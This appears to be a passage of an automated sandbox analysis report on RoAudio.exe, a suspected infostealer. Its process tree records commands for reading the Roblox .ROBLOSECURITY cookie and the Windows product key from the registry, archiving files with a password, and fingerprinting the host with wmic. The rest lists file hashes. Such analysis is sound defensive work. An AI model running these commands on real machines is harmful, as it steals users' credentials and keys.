C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:5776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Dmg8y.zip" *"3⤵PID:5840
-
C:\Users\Admin\AppData\Local\Temp\_MEI57922\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI57922\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\Dmg8y.zip" *4⤵
- Executes dropped EXE
PID:5032
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:5352
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:432
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:5084
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:1728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:4476
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:2020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:2624
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
PID:5292
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:4436
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:4552
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:1940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵PID:5588
-
-
-
-
C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"1⤵
- Executes dropped EXE
PID:552 -
C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2752
-
-
C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"1⤵
- Executes dropped EXE
PID:4004 -
C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"C:\Users\Admin\Downloads\DashBoardPlus\DashBoardPlus\RoAudio.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5568
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5d7114a6cd851f9bf56cf771c37d664a2
SHA1769c5d04fd83e583f15ab1ef659de8f883ecab8a
SHA256d2c75c7d68c474d4b8847b4ba6cfd09fe90717f46dd398c86483d825a66e977e
SHA51233bdae2305ae98e7c0de576de5a6600bd70a425e7b891d745cba9de992036df1b3d1df9572edb0f89f320e50962d06532dae9491985b6b57fd37d5f46f7a2ff8
-
Filesize
152B
MD5719923124ee00fb57378e0ebcbe894f7
SHA1cc356a7d27b8b27dc33f21bd4990f286ee13a9f9
SHA256aa22ab845fa08c786bd3366ec39f733d5be80e9ac933ed115ff048ff30090808
SHA512a207b6646500d0d504cf70ee10f57948e58dab7f214ad2e7c4af0e7ca23ce1d37c8c745873137e6c55bdcf0f527031a66d9cc54805a0eac3678be6dd497a5bbc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\924b525d-af04-479c-ba6b-95f2a3efaa37.tmp
Filesize6KB
MD5ccf8f368662e60902bb953d87167fc9b
SHA1858ac64d2c6385b2a8192aa8022c9f7ed30222c5
SHA2565da07bed315d5d71075ca4f32f34509ede8f0d08b09bb08eaf95594991a56bd1
SHA51243bd267d310bd3a4ef063be459a70cce10a0fb68c9b17f1a9a5fe6248abd043d6c4b2e5e8262330a23683498e34e870ae8173d8a55a2d04945f90ae5ad8f245d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD555c001d12a4b82c3d27196d67669b1c1
SHA1bbe08b2108b10051eafa0dda71f3f3fa1195d604
SHA25687dd1027674c3832598151d028e1087a733c9f0c1eaf3706f8d1f5dde427e57c
SHA51202b3cc3d16ca1949e62705480e6eb37aa2e340c796b8b2919d8e29260d71b3250efbe02944e1549db6c3ae3d20421bb245ce37d8096585f11886377459c0cc80
-
Filesize
460B
MD58bcb6241f7babb5582163eb5add4ec8c
SHA1d46613bee17707b397e427fced00a1ab6bbf1542
SHA256a9645d4190f060f499763d5d499eeae8c55111cdfd9cf781e51aa53f9a84ec9b
SHA5129d82ca66199e4bb2f7d4b08e3b46f1d144867b6efcee26595741ea8179d4b56fd677ca02eaf04ccb178d1c8847c1768e9769b99f26a6c06536ca6530f0403901
-
Filesize
5KB
MD5fa8d408c228fd0c7ace6c4e7106a513e
SHA1b65d4acc803fac1fc6f8d630f30d8ab180fba644
SHA256d422f2f86671e1af4f3fa593501d99596e138fd85083dbd292a50fc8ec07db31
SHA512d334d46bddc3234b5b93e09f043b96530bcca63d8a996dcd49feaa849af8ddedfd82305d54ded39c053d03c0ddfbe43a178ab3e13c3df878910e2d81b2eebf66
-
Filesize
6KB
MD50e44dc8a6ce98e35be5aebfa20b5d96c
SHA1131d3779700ea1dcc2873765c986e5bd9d655ce1
SHA2562462ddf10bead6533ca79f4d861472a0cdb6b60d11e0a4a13170500b1a161465
SHA512fcf13bb53e5a4cff52a9df7d6bafa6f2d32944041dcfcc5bf8c8f10bee81d8513af0a17d68638625d8e2da20800bbd0df17c37448c1145d1a9dc91adc08c1e34
-
Filesize
705B
MD57ce69b9697760d632b85e77459148d99
SHA138b4b5867de2c0e473fd4ea52eefcd7adff40c5c
SHA2565ac48610d3429107afb036335c603b2c7e10b9d788b8b024b8f6f2e012cddf56
SHA512c6c0735a298016b9024fd112a46d062f04d56123f35b84f5b7efe5d8d8c22be0568944ebbd2130bdf125c0bfdf12f3fe8364ff2121cbe1bfabab70ab1d827935
-
Filesize
705B
MD53089bcb4db3e324864d8937d85f42a67
SHA1396a51d2010fbbddc574fce7e2fd443942c62799
SHA25651d30055875f30a35fd4cd2b07dbaafd822d444a0db11831311a0cd9f5f181a6
SHA51283cfcb498147494d97fcfd885d09b01043eea3e12f3949aa00ad4dd6876b2184ddd1fb01a31e3c3b749ed81850d86675d8b6b609bdeb44c9e47e2974d215c82c
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
10KB
MD593440237c69a2b7f035c4812ef7e882e
SHA176612e55a07dc84d5b3de5f3b7ed2889283d8a32
SHA25633fe75e584f267446f88ea574518229e33ea2e0cce70f1fddd0b4678f221c268
SHA5125766877e939a30f18dea77c2ce4e7d49d8db9c43765fa244865815b8ddb62621510856677522a09f7e1d5f6db8aff15ed4290e885d35a65565003bc7459658ed
-
Filesize
10KB
MD5ddc7b787357bc3ee489e3f526ecd464f
SHA1d2202976e44ab6e523aaa45f60ae3c7f3ee69c76
SHA25602defcf673def183ca405ff4429d7db0ddb5b1ba16bb6864cb375e5317d2de17
SHA512a604bf59acd80f0ca004ad93e6c89308d29d25af9020d45e23cc1d643197a149a7721792d46f3a6bbd55f8adbd9588e462348f2386502888724a9e1d9decbd5b
-
Filesize
11KB
MD52e4526a6ca97d7d4224021a51695d3a9
SHA106e7ad61d5a0490d62f889b2768398248002c3e7
SHA25606c26faa58832218ea8d7fcb7d5030f5f3ffaf2fd03cfb3eda29f1b753082484
SHA51264d80968b83d33c01ce8dc173f69836ada07c9e922e47845761a2c65fa67c07d65d55ba490dc984359b57de10d20f66d12b3daf546a3a3340afec4b56b4f503e
-
Filesize
120KB
MD5d1b8f1b2bdd28797ebff277f95008a22
SHA135c0d173d15a15eab0d5182a679eb708982eae78
SHA256949341921c7ac84cc9ccc9b85bd952caffaf5495f5ca3cb2b3013be31af671b8
SHA5120d5b27a99ed37a72623c7bfe5e8831c3f4976f3a4ddfe933d434e1de97e22502f5841cefb1d1c417ad854501fcb39f2d7617b4ad2e1788658067d52930144b33
-
Filesize
106KB
MD549c96cecda5c6c660a107d378fdfc3d4
SHA100149b7a66723e3f0310f139489fe172f818ca8e
SHA25669320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d
-
Filesize
48KB
MD5c413931b63def8c71374d7826fbf3ab4
SHA18b93087be080734db3399dc415cc5c875de857e2
SHA25617bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA5127dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f
-
Filesize
58KB
MD500f75daaa7f8a897f2a330e00fad78ac
SHA144aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA2569ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4
-
Filesize
106KB
MD5e3fb8bf23d857b1eb860923ccc47baa5
SHA146e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0
SHA2567da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3
SHA5127b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c
-
Filesize
35KB
MD5b227bf5d9fec25e2b36d416ccd943ca3
SHA14fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e
-
Filesize
85KB
MD5542eab18252d569c8abef7c58d303547
SHA105eff580466553f4687ae43acba8db3757c08151
SHA256d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958
-
Filesize
25KB
MD5347d6a8c2d48003301032546c140c145
SHA11a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06
-
Filesize
43KB
MD51a34253aa7c77f9534561dc66ac5cf49
SHA1fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a
-
Filesize
56KB
MD51a8fdc36f7138edcc84ee506c5ec9b92
SHA1e5e2da357fe50a0927300e05c26a75267429db28
SHA2568e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0
-
Filesize
65KB
MD5f9cc7385b4617df1ddf030f594f37323
SHA1ebceec12e43bee669f586919a928a1fd93e23a97
SHA256b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA5123f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb
-
Filesize
1.4MB
MD532ede00817b1d74ce945dcd1e8505ad0
SHA151b5390db339feeed89bffca925896aff49c63fb
SHA2564a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7
-
Filesize
120KB
MD5a6084dd9909ec689c780bd266ea1fae5
SHA1c74511f0f3c29e5f7b79fc48ef1c9d86fff59c3b
SHA256c9cee5a6e4e5aec8ea24e90581833604a4b1e807746d081925f26cf006aceacf
SHA5122375554f0e637866589a10979aff1228024e7b94020f3516b65418b8049bcc1c1e74455a026d5daface64277ed7925de496cb442a852e615a230c840c31a9f9d
-
Filesize
1.6MB
MD578ebd9cb6709d939e4e0f2a6bbb80da9
SHA1ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA2566a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122
-
Filesize
29KB
MD508b000c3d990bc018fcb91a1e175e06e
SHA1bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA5128820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf
-
Filesize
223KB
MD5bf4a722ae2eae985bacc9d2117d90a6f
SHA13e29de32176d695d49c6b227ffd19b54abb521ef
SHA256827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73
-
Filesize
1.6MB
MD55f6fd64ec2d7d73ae49c34dd12cedb23
SHA1c6e0385a868f3153a6e8879527749db52dce4125
SHA256ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab
-
Filesize
615KB
MD59c223575ae5b9544bc3d69ac6364f75e
SHA18a1cb5ee02c742e937febc57609ac312247ba386
SHA25690341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA51257663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
Filesize
456B
MD54531984cad7dacf24c086830068c4abe
SHA1fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA25658209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA51200056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
-
Filesize
25KB
MD545d5a749e3cd3c2de26a855b582373f6
SHA190bb8ac4495f239c07ec2090b935628a320b31fc
SHA2562d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea
-
Filesize
622KB
MD5dbc64142944210671cca9d449dab62e6
SHA1a2a2098b04b1205ba221244be43b88d90688334c
SHA2566e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA5123bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b
-
Filesize
295KB
MD58c42fcc013a1820f82667188e77be22d
SHA1fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA2560e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA5123a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7.5MB
MD58bbbdf121a25dcd4646e3a4a9ac43132
SHA1a9eb2535f4b21603825f81dfcbbfb3c6eb8d85e5
SHA256c116443d201ee85e9572773ec5e1ebf75575c2d0b56611d3a4824696c6553c1d
SHA5120664d15ed04275ee4cd03380ef5fd8dc11d52f3677aea94ea1fadfd499a6d9b318e022b3745a2eda2c324bfc4b1968ccdcf227746817a34a21a9195098670f8b
-
Filesize
3.7MB
MD53a2f16a044d8f6d2f9443dff6bd1c7d4
SHA148c6c0450af803b72a0caa7d5e3863c3f0240ef1
SHA25631f7ba37180f820313b2d32e76252344598409cb932109dd84a071cd58b64aa6
SHA51261daee2ce82c3b8e79f7598a79d72e337220ced7607e3ed878a3059ac03257542147dbd377e902cc95f04324e2fb7c5e07d1410f0a1815d5a05c5320e5715ef6